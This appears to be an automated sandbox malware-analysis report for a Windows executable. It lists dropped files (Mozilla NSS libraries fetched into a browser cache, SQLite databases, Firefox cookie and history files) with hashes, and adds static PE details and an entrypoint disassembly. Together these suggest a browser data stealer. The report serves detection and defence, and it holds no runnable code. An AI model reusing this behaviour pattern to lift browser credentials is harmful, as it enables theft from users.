File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.03862698848467049
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWHxAserRNbekZ3DmVxL1HI:58r54w0VW3xWmfRFj381
MD5:	507BA3B63F5856A191688A30D7E2A93A
SHA1:	1B799649D965FF1562753A9EB9B04AC83E5D7C57
SHA-256:	10A34BE61CD43716879A320800A262D0397EA3A8596711BDAE3789B08CB38EF8
SHA-512:	7750584100A725964CAE3A95EC15116CDFE02DE94EFE545AA84933D6002C767F6D6AF9D339F257ED80BDAD233DBF3A1041AB98AB4BF8B6427B5958C66DCEB55F
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\HCAAEBKEGHJKEBFHJDBFCFBKKJ

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\IIJEBAECGCBKECAAAEBF

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\JJDGCGHCGHCBFHJJKKJEHJEHJE

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.8467337400211222
Encrypted:	false
SSDEEP:	24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBOiICtj+tCXq4E1:TeAFawNLopFgU10XJBO+tq0qj
MD5:	7A03CC0EAD0AEFF210C3E60823AAA5EC
SHA1:	8B9C99FBEC440663C71F10F70B9386C68CF0EC1D
SHA-256:	D19C0286BB552C8F121A87A8B483E4997F846F0EB586F6BAF269C352678356CF
SHA-512:	8BF799B9351399523796198E1B1160AD81E1C153148D24505AAD28143698DAF77665C26BBFB24650EB150AF8D92DD1623AE8ECB62D29C93EC3E4BB206E0C83DD
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\KFCFIEHCFIECBGCBFHIJ

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	0.8746135976761988
Encrypted:	false
SSDEEP:	96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
MD5:	9E68EA772705B5EC0C83C2A97BB26324
SHA1:	243128040256A9112CEAC269D56AD6B21061FF80
SHA-256:	17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
SHA-512:	312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\freebl3.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\mozglue.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\msvcp140.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\ProgramData\nss3.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\softokn3.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\vcruntime140.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\freebl3[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\mozglue[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\msvcp140[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\nss3[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\softokn3[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\vcruntime140[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cookies.sqlite-shm

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\places.sqlite-shm

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.947874920423357
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	1'863'168 bytes
MD5:	b1197df51b22f8d4c9c9e0e552e8a627
SHA1:	01aa572ac1a7f89bdcbbccb757fb0869f232f954
SHA256:	a67b224f6e0df8b93806ed24cd1a09afb539d242add6b52f63600f28b65b3d1d
SHA512:	771fb9f4c32a6fea9265777a319ff605e614a80d679377e10de4117274cfe10a6d3074d1ba0fe5328d2cfe918fd63d59a3731283f1c4bf1935c3b77b021507a3
SSDEEP:	49152:mMpvgTJ09TDmxKXTpSoaPLol5UuyBmQHnKwuy:m4Ka9TDmxKwpLS5MBm0
TLSH:	3985336218EE647DFBC19132B46F8B51F8ACAE4C68988E64F5B11F4D4CCF372851AC46
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L.../..f...........

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0xaa6000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x66F1BA2F [Mon Sep 23 18:57:51 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007FB7710DD1AAh
cmovl ebx, dword ptr [eax+eax]
add byte ptr [eax], al
add byte ptr [eax], al
jmp 00007FB7710DF1A5h
add byte ptr [edx+ecx], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [eax], eax
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add al, 0Ah
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
or byte ptr [eax+00000000h], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add al, 0Ah
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Rich Headers

Programming Language:

[C++] VS2010 build 30319
[ASM] VS2010 build 30319
[ C ] VS2010 build 30319
[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[LNK] VS2010 build 30319

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x25d050	0x64	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x25d1f8	0x8	.idata
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
